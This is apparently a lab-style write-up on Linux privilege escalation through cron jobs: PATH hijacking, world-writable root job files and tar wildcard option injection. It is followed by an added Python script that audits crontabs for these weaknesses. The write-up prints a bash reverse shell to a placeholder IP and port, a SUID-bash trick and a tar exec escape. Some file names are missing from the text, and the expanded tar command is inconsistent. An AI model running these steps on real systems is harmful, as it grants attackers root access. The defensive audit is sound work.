Linux PrivEsc 3: CronJobs

Cron jobs are tasks that run on a schedule. They can be abused in several situations, such as when a job's command is given without an absolute path or when the files being executed have weak permissions.

We can enumerate cron jobs by reading the system cron table, /etc/crontab, or the per-user tables under /var/spool/cron/ or /var/spool/cron/crontabs/.

In this case we have 2 user-defined jobs – one running a file with no absolute path and another running /usr/local/bin/, both run as root every minute.

No Absolute Path

Using locate to find the file shows that it is located in /usr/local/bin. This directory is also on our path, as the third location checked for the file.

If we have write permissions on a directory earlier in the path we can create a file with the same name there containing any contents that we like – in this case a simple bash script to spawn a reverse shell. Don’t forget to add executable permissions to the file.

/bin/bash -i >& /dev/tcp/<IP address>/<port> 0>&1

The cronjob runs every minute, so setting up a listener and waiting for up to a minute will provide a shell as root.

Insecure Permissions

In this case the file /usr/local/bin/ has world-writable permissions set, meaning we can edit the file.

We can abuse this in the same way as writing our own file; this time, though, I appended a line to copy bash into /tmp and set the SUID bit.

Once again, after a short wait the cronbash file appears in /tmp with SUID set; running it will grant a shell as root.


Taking a look at, we have no write or execute permissions, we can only read the file.

The file simply runs a script that switches to /home/user, then uses tar to compress the contents of /home/user to /tmp/backup.tar.gz, selecting the files with a wildcard.

Checking for any shell escape methods using tar nets the following.

tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

We can create files in /home/user named as the switches used in this command.

I created a bash script named containing the following payload, gave it executable permissions and created 2 files: --checkpoint=1 & --

/bin/bash -i >& /dev/tcp/<IP address>/<port> 0>&1

This will essentially run the following command when the cronjob executes:

tar czf /tmp/backup.tar.gz --checkpoint=1 myvpn.ovpn tools

After a short wait for the cronjob to execute, we are once again granted a reverse shell as root.
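
From the defensive side, the three weaknesses above can be checked for before anyone else finds them. This is an added example, not code from the original post: a Python audit of /etc/crontab-format text that flags commands with no absolute path (plus world-writable PATH directories), world-writable job files or parent directories, and job scripts that run tar on a bare *. The finding names are made up for this example, cron's default PATH is assumed to be /usr/bin:/bin, world-writable stands in for "writable by an unprivileged user", and tar is only looked for inside the job's script, not on the crontab line itself.

```python
import os, re, stat

BUILTINS = {"cd", "test", "[", "export", "umask"}  # run by the shell, not found via PATH

def world_writable(path):  # True if path exists with the other-write bit set
    try:
        return bool(os.stat(path).st_mode & stat.S_IWOTH)
    except OSError:
        return False

def tar_glob(path):  # True if the script at path runs tar with a bare * not preceded by --
    try:
        with open(path, errors="replace") as fh:
            text = fh.read(65536)
    except OSError:
        return False
    for seg in re.split(r"&&|\|\||[;|\n]", text):
        w = seg.split()
        if w and os.path.basename(w[0]) == "tar" and "*" in w and "--" not in w[:w.index("*")]:
            return True
    return False

def audit_crontab(text, path_dirs=("/usr/bin", "/bin")):
    """Return (line_no, issue, subject) findings for /etc/crontab-format text."""
    findings, path_dirs = [], list(path_dirs)
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        env = re.match(r"(\w+)\s*=\s*[\"']?([^\"']*)", line)
        if env and env.group(1) == "PATH":
            path_dirs = env.group(2).split(":")
        n = 2 if line.startswith("@") else 6      # @reboot-style lines have one time field
        fields = line.split(None, n)
        if env or line.startswith("#") or len(fields) <= n:
            continue
        for seg in re.split(r"&&|\|\||[;|]", fields[n]):
            prog = (seg.split() or [""])[0]
            if not prog or prog in BUILTINS:
                continue
            if not prog.startswith("/"):          # resolved through PATH at run time
                findings.append((no, "relative-command", prog))
                findings += [(no, "writable-path-dir", d) for d in path_dirs if world_writable(d)]
                continue
            if world_writable(prog) or world_writable(os.path.dirname(prog)):
                findings.append((no, "writable-target", prog))
            if tar_glob(prog):
                findings.append((no, "tar-wildcard", prog))
    return findings
```

Each finding maps to a fix: give the job an absolute path, remove other-write from the file and its directory, and pass tar its file list as ./* or after -- so file names cannot be parsed as options.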
